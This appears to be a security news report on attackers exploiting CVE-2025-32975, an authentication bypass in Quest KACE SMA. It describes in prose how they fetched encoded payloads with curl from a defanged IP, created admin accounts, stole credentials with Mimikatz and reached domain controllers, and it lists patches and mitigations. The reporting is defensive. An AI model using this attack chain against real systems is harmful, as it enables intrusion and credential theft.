Critical Vulnerability in Quest KACE SMA Exploited by Hackers
In March 2026, cybersecurity firm Arctic Wolf identified malicious activities targeting unpatched Quest KACE Systems Management Appliance (SMA) systems. These attacks exploited a severe security flaw, designated as CVE-2025-32975, which had been patched in May 2025.
Understanding CVE-2025-32975
CVE-2025-32975 is an authentication bypass vulnerability in Quest KACE SMA versions prior to 13.0.385, 13.1.81, 13.2.183, 14.0.341 (Patch 5), and 14.1.101 (Patch 4). This flaw allows attackers to impersonate legitimate users without valid credentials, potentially leading to full administrative control over the affected systems. The vulnerability arises from improper handling of the Single Sign-On (SSO) authentication mechanism, enabling unauthorized access through specially crafted requests.
Details of the Exploitation
Arctic Wolf’s observations from the week of March 9, 2026, revealed that threat actors exploited CVE-2025-32975 to gain administrative access to unpatched SMA systems exposed to the internet. The attackers executed remote commands to download and execute Base64-encoded payloads from an external server (216.126.225[.]156) using the curl command.
Subsequent actions by the attackers included:
– Creation of Additional Administrative Accounts: Utilizing runkbot.exe, a background process associated with the SMA Agent, the attackers created new administrative accounts.
– Windows Registry Modifications: Through PowerShell scripts, the attackers altered Windows Registry settings, likely for persistence or system configuration changes.
– Credential Harvesting: Tools like Mimikatz were employed to extract credentials from the compromised systems.
– System Reconnaissance: The attackers enumerated logged-in users and administrator accounts and executed commands such as net time and net group to gather information about the network environment.
– Access to Critical Infrastructure: Remote Desktop Protocol (RDP) access was obtained to backup infrastructures, including Veeam and Veritas, as well as domain controllers.
Implications of the Attack
The exploitation of CVE-2025-32975 poses significant risks:
– Complete System Compromise: Attackers can gain full administrative control, allowing them to manipulate system configurations, deploy malware, and exfiltrate sensitive data.
– Credential Theft: Harvested credentials can be used for lateral movement within the network, leading to further system compromises.
– Disruption of Services: Unauthorized access to backup systems and domain controllers can result in data loss, service outages, and operational disruptions.
Recommendations for Mitigation
To protect against such exploits, administrators should:
1. Apply Security Patches Promptly: Ensure that Quest KACE SMA systems are updated to versions 13.0.385, 13.1.81, 13.2.183, 14.0.341 (Patch 5), or 14.1.101 (Patch 4) or later.
2. Restrict Internet Exposure: Avoid exposing SMA instances directly to the internet.
3. Monitor System Activity: Implement continuous monitoring to detect unauthorized access and unusual activities.
4. Enhance Authentication Mechanisms: Utilize multi-factor authentication and regularly review access controls.
5. Conduct Regular Security Audits: Periodically assess systems for vulnerabilities and compliance with security policies.
Conclusion
The exploitation of CVE-2025-32975 underscores the critical importance of timely patch management and robust security practices. Organizations must remain vigilant, ensuring that systems are updated and adequately protected against known vulnerabilities to prevent unauthorized access and potential data breaches.
